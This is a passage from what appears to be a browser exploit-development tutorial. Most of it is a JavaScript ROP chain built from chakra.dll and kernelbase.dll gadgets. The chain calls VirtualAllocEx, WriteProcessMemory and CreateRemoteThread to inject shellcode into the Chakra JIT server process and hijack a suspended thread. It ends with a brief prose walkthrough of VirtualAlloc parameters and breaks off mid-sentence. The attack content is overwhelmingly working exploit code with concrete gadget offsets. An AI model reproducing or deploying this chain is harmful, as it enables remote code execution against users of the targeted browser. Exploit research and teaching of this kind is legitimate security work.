write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// SIZE_T dwSize (R8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // 0x1000 (shellcode size)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();

// LPVOID lpAddress (RDX)
// Let VirtualAllocEx decide where the memory will be located
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL address (let VirtualAllocEx deside where we allocate memory in the JIT process)
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     				   // Recall RAX already has a writable pointer in it

// Call KERNELBASE!VirtualAllocEx
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0xff00, kernelbaseHigh); // KERNELBASE!VirtualAllocEx address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!VirtualAllocEx)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!VirtualAllocEx - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD flProtect (RSP+0x28) (PAGE_READWRITE)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

// WriteProcessMemory() ROP chain
// Stage 3 -> Write our shellcode into the JIT process

// Store the VirtualAllocEx return address in the .data section of kernelbase.dll (It is currently in RAX)

/*
0:015> dq kernelbase+0x216000+0x4000 L2
00007fff`58cfa000  00000000`00000000 00000000`00000000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where we will store VirtualAllocEx allocation
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
next();

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // SIZE_T nSize (0x1000)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds our full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     // Recall RAX already has a writable pointer in it

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000-0x8, kernelbaseHigh); // .data section of kernelbase.dll where we have our VirtualAllocEx allocation
next();                                                                            // (-0x8 to compensate for below where we have to read from the address at +0x8 offset
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x255fa0, chakraHigh);      // mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret
next();

// LPCVOID lpBuffer (R8) (shellcode in chakra.dll .data section)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000, chakraHigh);    	  // .data section of chakra.dll holding our shellcode
next();

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

// CreateRemoteThread() ROP chain
// Stage 4 -> Create a thread within the JIT process, but create it suspended
// This will allow the thread to _not_ execute until we are ready
// LPTHREAD_START_ROUTINE can be set to anything, as CFG will check it and we will end up setting RIP directly later
// We will eventually hijack RSP of this thread with a ROP chain, and by setting RIP to a return gadget our thread, when executed, will return into our ROP chain
// We will update the thread later via another ROP chain to call SetThreadContext()

// LPTHREAD_START_ROUTINE lpStartAddress (R9)
// This can be any random data, since it will never be executed
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x28b4fe, chakraHigh);	   // 0x180043c63: Anything we want - this will never get executed
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds our full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();

// LPSECURITY_ATTRIBUTES lpThreadAttributes (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL (default security properties)
next();

// SIZE_T dwStackSize (R8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);      // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // 0 (default stack size)
next();

// Call KERNELBASE!CreateRemoteThread
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0xdcfd0, kernelbaseHigh); // KERNELBASE!CreateRemoteThread
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!CreateRemoteThread)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!CreateRemoteThread - 0x180243949: add rsp, 0x38 ; ret
next(); 
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // LPVOID lpParameter (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD dwCreationFlags (RSP+0x30) (CREATE_SUSPENDED to avoid executing the thread routine)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // LPDWORD lpThreadId (RSP+0x38)
next();

// WriteProcessMemory() ROP chain (Number 2)
// Stage 5 -> Update the final ROP chain, currently in the charka.dll .data section, with the address of our shellcode in the pop rcx gadget for lpAddress

// Before, we need to preserve the thread HANDLE returned by CreateRemoteThread
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a100, kernelbaseHigh); // .data section of kernelbase.dll where we will store the thread HANDLE
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
next();

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000008, 0x00000000);             // SIZE_T nSize (0x8)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Current process
next();

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000+ropoffsetOne, chakraHigh); // .data section of chakra.dll where our final ROP chain is
next();                                                                       

// LPCVOID lpBuffer (R8) (Our kernelbase.dll .data section address which points to the value we want to write, the allocation of the VirtualAllocEx allocation)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where the VirtualAllocEx allocation is stored
next();

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

// WriteProcessMemory() ROP chain (Number 3)
// Stage 6 -> Update the final ROP chain, currently in the charka.dll .data section, with the address of our shellcode in the pop rdi gadget for our "fake return address"

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000008, 0x00000000);             // SIZE_T nSize (0x8)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Current process
next();

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000+ropoffsetTwo, chakraHigh); // .data section of chakra.dll where our final ROP chain is
next();                                                                       

// LPCVOID lpBuffer (R8) (Our kernelbase.dll .data section address which points to the value we want to write, the allocation of the VirtualAllocEx allocation)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where the VirtualAllocEx allocation is stored
next();

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

// VirtualAlloc() ROP chain
// Stage 7 -> Allocate some local memory to store the CONTEXT structure from GetThreadContext

// DWORD flProtect (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // PAGE_READWRITE (0x4)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// LPVOID lpAddress (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL (let VirtualAlloc() decide the address)
next();

// SIZE_T dwSize (RDX) (0x4d0 = sizeof(CONTEXT))
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x000004d0, 0x00000000);             // (0x4d0 bytes)
next();

// DWORD flAllocationType (R8) ( MEM_RESERVE | MEM_COMMIT = 0x3000)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);      // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00003000, 0x00000000);             // MEM_RESERVE | MEM_COMMIT (0x3000)
next();

// Call KERNELBASE!VirtualAlloc
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x5ac10, kernelbaseHigh); // KERNELBASE!VirtualAlloc address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!VirtualAlloc)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!VirtualAlloc - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38     
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
next();

This call is pretty straight forward, and since there are only four parameters we don’t have to write any parameters to the stack.

We start out with the flProtect parameter (again we have to make sure RAX is writable because of a gadget when performs cmp r8d, [rax]). We can set a breakpoint on jmp rax, as we have seen, to reach our first gadget within the VirtualAlloc ROP chain.

The first parameter we are going to start with flProtect parameter, which we will set to 4, or PAGE_READWRITE.

Our call to VirtualAlloc is now in this state:

VirtualAlloc(
	-
	-
	-
	PAGE_READWRITE			// Make sure the page is writable so GetThreadContext can write to it
);

The next parameter we will address is lpAddress - which we will set to NULL.

This brings our call to the following state:

VirtualAlloc(
	NULL,				// Let the system decide where to allocate the memory
	-
	-
	PAGE_READWRITE			// Make sure the page is writable so GetThreadContext can write to it
);

Next up is our dwSize parameter. We showed earlier how to calculate the size of a CONTEXT structure, and so we will use a value of 0x4d0.

This brings us to the following state - with only one more parameter to deal with:

VirtualAlloc(
	NULL,				// Let the system decide where to allocate the memory
	sizeof(CONTEXT),		// The size we want to allocate (size of a CONTEXT structure)
	-
	PAGE_READWRITE			// Make sure the page is writable so GetThreadContext can write to it
);

The last parameter we need to set is flAllocationType, which will be a value of 0x3000.

This completes our parameters:

VirtualAlloc(
	NULL,				// Let the system decide where to allocate the memory
	sizeof(CONTEXT),		// The size we want to allocate (size of a CONTEXT structure)
	MEM_COMMIT | MEM_RESERVE,	// Make sure this memory is committed and reserved
